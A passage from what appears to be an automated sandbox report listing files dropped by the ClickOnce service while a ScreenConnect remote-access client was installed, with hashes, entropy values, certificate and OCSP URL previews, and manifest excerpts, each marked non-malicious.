                                                                                                                                                                              SHA-512:C352F773D1E10906354A5D514AEACD2FEAA8D47E742AF1532260EE23F97A08FCDC922DE357DEF217B92A828B918352B1023D9B5EA336CC8936D566845BF5E30F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.541233018339637
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5onfZbc5RlRtBfQFnsPJon73TpIlnoRiShAaPlQPwQccWSCc88udFycdJGPzaw6:5iRcdZunVn76siShA2DcWSCcsdFycrGU
                                                                                                                                                                              MD5:88B8D0E33C25FA379EBEB690CB345BE7
                                                                                                                                                                              SHA1:D61AB5D26023149919DC1F376596A1BF90F45BCD
                                                                                                                                                                              SHA-256:EDE7A96C7B26C2928F377267F2E58A3210B38E8C82E05C645F617E58DFA79D37
                                                                                                                                                                              SHA-512:11B51B1D987CEBD423608296BB95B1C01294E7EA0861700D527F08955B7FA8AEAF41BBF2B3990BEDFB7BDA4A9C277270548BB01E8AD5D1A36155363CF63D28B2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                              Entropy (8bit):3.4738726491832708
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKrE486jsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:PXDkPlE99SCQl2DUevat
                                                                                                                                                                              MD5:E69C33172936F4E93182E21B5EB95DF1
                                                                                                                                                                              SHA1:120BA428189DE165F03322CFF75443D89C6D2CE9
                                                                                                                                                                              SHA-256:6E594BD11706A5D798FA9FCBB9E1F9AE1CE9AC8575DE4FBF5D6AC0E7EFD3F78B
                                                                                                                                                                              SHA-512:EA536463FA14D7AE0CCAEC90296C5F013B23E7A2991E4A3860F4EF24CAC97859961CA252D4FE76228284B37426CC18145983CF3EFB8A0651EDFF1B0F1EBB5903
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ........HL!..+..(...............................................^E.5.*.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                              Entropy (8bit):3.2220917896724686
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKH9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ODImsLNkPlE99SNxAhUe/3
                                                                                                                                                                              MD5:49D50750DFE8E9105163D70435CCB31A
                                                                                                                                                                              SHA1:361329BC152826B970C495C94C6B581A193CDF2C
                                                                                                                                                                              SHA-256:14749747E9521976E718D7F3424F8B1BD1F592C1F4924948CB449D9D55AA95DD
                                                                                                                                                                              SHA-512:83B63E1E65A500459B4C1D058319C7EBFDC64E8C4ACA78BAC7AC19D6128533FA9C37E15571BB9218EE7521A704D3D3404D688B07358B2B69EB62909BFC1651E3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ........>cpb.*..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                              Entropy (8bit):3.9240099056320994
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kK3jWk6hhQfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhlwA9RyclWn:HFmxMiv8sF3HtllJZIvOP200A9UUW
                                                                                                                                                                              MD5:3B1C1077A8C2A2250C6AC51664505585
                                                                                                                                                                              SHA1:9C020EF5CEA872D62FF2B5F033A6878F3DACF698
                                                                                                                                                                              SHA-256:AE6CC0BCD4087FB245C6B8DCFEF39D28ED6F6CBBD5229818FDBA723AFAA50C0F
                                                                                                                                                                              SHA-512:9549195CB431B9C83C989828439664323FC1BE31EF6CD01EF7CD62FDAB61FD7C637A292529B22A178944084DD441211E64C27640A9A16D211395AD550ACF9BA9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... .... ...._...*..(................G./.)......./......................./.. ...........-*.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.u.T.Y.A.U.b.z.P.Z.m.Q.p.m.J.m.N.W.6.l.8.4.%.3.D...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                              Entropy (8bit):4.011468422985992
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:OU6F95SmxMiv8sFBSfamB3rbFURMOlAkr:76FzSmxxv7Sf13rbQJr
                                                                                                                                                                              MD5:4079F296F7DA7BEDF995A97BFF1D93FA
                                                                                                                                                                              SHA1:05349557531F8DBDA849D9A90F15521AB9FAD291
                                                                                                                                                                              SHA-256:98E1C2B671349D365A8A63552E698D49629F724AAA2331789655310C76DC15B9
                                                                                                                                                                              SHA-512:FC4CA759162B49A4C938B0CF3A4C8934135B8EE238455D637CB7F3019CBDC550D04E7889DD631CD3B2D2B1B66CAF031F29CD3BD6CE814B391A5E67FE8F7A685D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ....(........*..(................]@.(....$. .....................$. ... .........".+*.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                              Entropy (8bit):3.0454180223653617
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKptLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:fLYS4tWOxSW0PAMsZp
                                                                                                                                                                              MD5:BB305B10EF7153417E5C69E6E49210D6
                                                                                                                                                                              SHA1:B54F49066486F8B2A3AA971771B98231AEFB47CC
                                                                                                                                                                              SHA-256:57A881C8278B7D652A63C2B4EC90713B7C3B12A4CD3BE54738AE00ED8C620E0F
                                                                                                                                                                              SHA-512:DD51C4F3E56BA2C76FDDA4774702B33E827B9A4B5F44A27581225FD884EBF8EA1BCF42CFD96FD61D89CFE37A89D4788877638A9F6EF56C4A2E9189C348530ADC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:p...... ....l......r*..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25496
                                                                                                                                                                              Entropy (8bit):5.641771107273899
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:93UqakYvm1K86qvAX9hCjX9R/QPIBM7Y6Ou8U8ecsUiOg:9tlYvm96WAX94X9R/QPI+0du8XU
                                                                                                                                                                              MD5:CCC685567EF52AB16009766479D61B95
                                                                                                                                                                              SHA1:1EE41B15C8DB79B6E5225195091B165608752844
                                                                                                                                                                              SHA-256:C5AB2C771EFCFED016C8D62210A65F31A50E1B7CB8D0ECAE5C5ABBE198A9704F
                                                                                                                                                                              SHA-512:8BAF2D4EC1A76A910683B0B76C4C175B4EAF43BF59CCAA5108B20C079971549783AE8F70C59C8A126A9F8EA4200C38E85DE4ADC583997F1D9E0306BCD71B6A85
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.957264907751996
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:jeowfbgEfIaMLf6svxX9nCCX9FX9R/QPIYM7Y7:jF68xX9fX9FX9R/QPIN07
                                                                                                                                                                              MD5:F4B84E283123B025A90BBDE33E2080FD
                                                                                                                                                                              SHA1:CC57BFD02228BE76C6E08BDE16996FA992FF0E54
                                                                                                                                                                              SHA-256:93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02
                                                                                                                                                                              SHA-512:ABC92965BF97C37A614B556D2219D06E63687777D79DF5FFB4B5D447DD138C160E5A45CAB76A2353D758AD62960F2E58745F0523881FF6C0EA4CCBCD7ED40002
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="23.9.10.8817" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3452
                                                                                                                                                                              Entropy (8bit):4.479272723108119
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:kZWvuWWjeV+WwQXqmL4Mco7rwQQNLokgmhIYX:n7J9UMco3QxgGf
                                                                                                                                                                              MD5:63279C20E2F3749270984C29C793D055
                                                                                                                                                                              SHA1:01C9E866764BBEF4879276EE72D99A85EE83DBFC
                                                                                                                                                                              SHA-256:AB7C6AB2985AC24CD85258E42598C2450CB99CBF60D4BA9EA80A338BC4CED207
                                                                                                                                                                              SHA-512:C845123B3FB7E37502E86E86BD6B1B606B120AEDA77B5FB46DF8A6F28D03E1259C4F8EA7BFBC45189FC002A873606B1C946EDAB1EBFBAE3782BBCF1F629C5BBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.130181995746891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0AKvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AGGVETDTo
                                                                                                                                                                              MD5:6DA6DC34636435E9C2BD1B5FF79091B5
                                                                                                                                                                              SHA1:61B6D8C16330FE9063F041BCC025C10DE82D876B
                                                                                                                                                                              SHA-256:98D4EDAA86468540D2D17EF17A9BCD7224B128099A51A8F92A65A88950DCB44C
                                                                                                                                                                              SHA-512:0BB929107ECFA257DFB2FF7B37955D8C2402287E989C015632A6292362858667A398AD0563103C1324A29585A8177AAA4BCE3C57D867735E40D2CC5C996BD5B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5260
                                                                                                                                                                              Entropy (8bit):4.868524490497656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:vR8aP+RxU9LWeV+Ww7DkVyuokZR+PtYAaUeiBdVfNODngnsRR:ORxUNpJ9VbPZR+VHaodX+Qc
                                                                                                                                                                              MD5:2FE0E22C3E8600C64E8399680A6BDB45
                                                                                                                                                                              SHA1:7B6E0B72F8147F5A7B93766C892E4B2D85613DBF
                                                                                                                                                                              SHA-256:38D360EEEA5E7840CD26917CD4092A48FD74DBD024A7A57382A0FDCBAD9231D8
                                                                                                                                                                              SHA-512:05B2F361B12646C0A62BEB632F6DB5A85B805AB36D191CA49BAEB629BBE3E61A2B8075793C94AE96EE6725EB1D6E5008E632F504A36F410444F0FBBE8228827D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.056583067402645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AovSkcyMQcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AkHMQGQAXRTFgTo
                                                                                                                                                                              MD5:1FB3A39063C9FBBC9252D1224CF8C89D
                                                                                                                                                                              SHA1:0F0622EB6205F515651E055C17D0067A94308721
                                                                                                                                                                              SHA-256:199C3F5089B07F1FB6CB343180620B2094BCDDA9E1F6A3F41269C56402D98439
                                                                                                                                                                              SHA-512:8C70FF2FE2F1935454AA6BB4CE0998DA1ADCBFE7219F1EAEE4688EE86BBC730DE30347F39B9B1413CBD345D1BF786491ED2F79142D9333DBA3A7F0EDC9F48E3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6588
                                                                                                                                                                              Entropy (8bit):3.9907209780729116
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:KBHGBIeeV+Wwwz8WpMbLYIsVJCMvCRgj6g5S7Gn6qB/M:VIBJDpMXE7Xf6d
                                                                                                                                                                              MD5:D3A222297153D1019A962FE799A9F111
                                                                                                                                                                              SHA1:9F27D72E9C0A57F9B191D80BA8038B7C78CF605D
                                                                                                                                                                              SHA-256:7F4CD63365ACA9692DF05969A0917FDEB3654610478883196FE58A7AC4B4450C
                                                                                                                                                                              SHA-512:4B059A3711D3C9A9071F05CA6904630954243D06C7B2E56507559E20995A9FA73C3EECD0E64F72375A5A67378FC71DDAADC8DD787F63730F9FD5A88DA7619D3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.02538862565643
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0A7HMQAXQ3MQTMQRGTDBTo:1YiW4AIBvtI
                                                                                                                                                                              MD5:EFA59A7F55AF829C3974A02F30EBE80C
                                                                                                                                                                              SHA1:0FABA6763D910D5EE104E3457045C63CCC5BF79B
                                                                                                                                                                              SHA-256:3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A
                                                                                                                                                                              SHA-512:72262B09C21DC4A2B2701A5B32C149349FA3107035D5A115EAC4335E3961DCF12A7A867AEFF595C13AA618EA955B604538C0F4E529CB6A76FFF0CB75927CC74D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3032
                                                                                                                                                                              Entropy (8bit):4.726757905074407
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:ORQK3QSc8V4g5e6S+9oww7gB7wHzlK1SbDddFfjM2Qnwbn:sQDScueV+WwwQwzlMMDrFrMtnEn
                                                                                                                                                                              MD5:61F68B83DDE2AD7405637AD82CC21D71
                                                                                                                                                                              SHA1:F3688A70CF6FFB4EEDDB91622BEE057F27C37C50
                                                                                                                                                                              SHA-256:C37855257D2375E82D2EC61E9FDCF0953221807215ADD6269EB502CDFF81117D
                                                                                                                                                                              SHA-512:DA38426D2B0A26A203C98D33F840A8985966025A0E9ABEA343CB1E3D8001E2C4E2905396AFD05E56B81763E503905CC4310174E54399ACE7497C8557B35AA57F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.148278749531531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0ApR7vNxW57FpS+iENg49vNxW5NgMiNg49vNxWO:JdFYZ8h9onRigeP0AqvSkcyMQcVSkTo
                                                                                                                                                                              MD5:9CE092E164085CE2566F654314BF99DC
                                                                                                                                                                              SHA1:ACEF36091EC262A4C42AA5A5B394C71B13B4767E
                                                                                                                                                                              SHA-256:6B36DDCE4021FD15C29CF63C7102E60EDFE2627D1B00EF97D0B4DE3051737439
                                                                                                                                                                              SHA-512:95BD7F9315DC181DE529D940E697B652651BC9E954E96FBC059998909259A719AF062548C533D24350C25A159CB113F568EB7C622AE3069CE25FB9224EBF02A6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14612
                                                                                                                                                                              Entropy (8bit):5.712742207617309
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:XVh4+Qgk9qH6FySAU8s8o5yjEadngN8s8oTN2x2QPIlFDLhEDh7BqWoDOM:XVe9qH6UZUX95QEBX9R/QPIBM7YDT
                                                                                                                                                                              MD5:1E8131C9149A39CB86CA3D5905B573CC
                                                                                                                                                                              SHA1:8C9B0718846063CAA2B9EAE502B21595A747D848
                                                                                                                                                                              SHA-256:697D83C25828A7C1B7CC1BB3FDD6B9EABD14888A4A750B05EC0B08BA5908B4ED
                                                                                                                                                                              SHA-512:1B9F84381899FFF1372E6BCBFAF2DFB9A568D746F6965390B633F6DD0FDC0E277C2D5C463E5BCA72F1CD4DBE878875E43F00FD207FA2734EF2B9124613D458BC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144124
                                                                                                                                                                              Entropy (8bit):5.694726688017173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:F/0/BZSGr3qk54q8sYV7WfUIRTLTyErpErpXm2o9HuzhJOvP:F8BCk5GVW/RWErpErpXmt8vOvP
                                                                                                                                                                              MD5:15C0340778DF443695BEC662F9D21534
                                                                                                                                                                              SHA1:D08FF59760BF40564E38F7256D7172565EF2B4D5
                                                                                                                                                                              SHA-256:7D3A856309950D41FDF338919E115830115F9D56E3A2B9D0EED37E90315D2C80
                                                                                                                                                                              SHA-512:F273BB1BCA5A8F505488405C1F7059DE4E5509B390AF3E7DA465911BCAE7D10884349C6AD09723752490CB329E0ACB63603F69E781F1F348191F1AF6F657F910
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
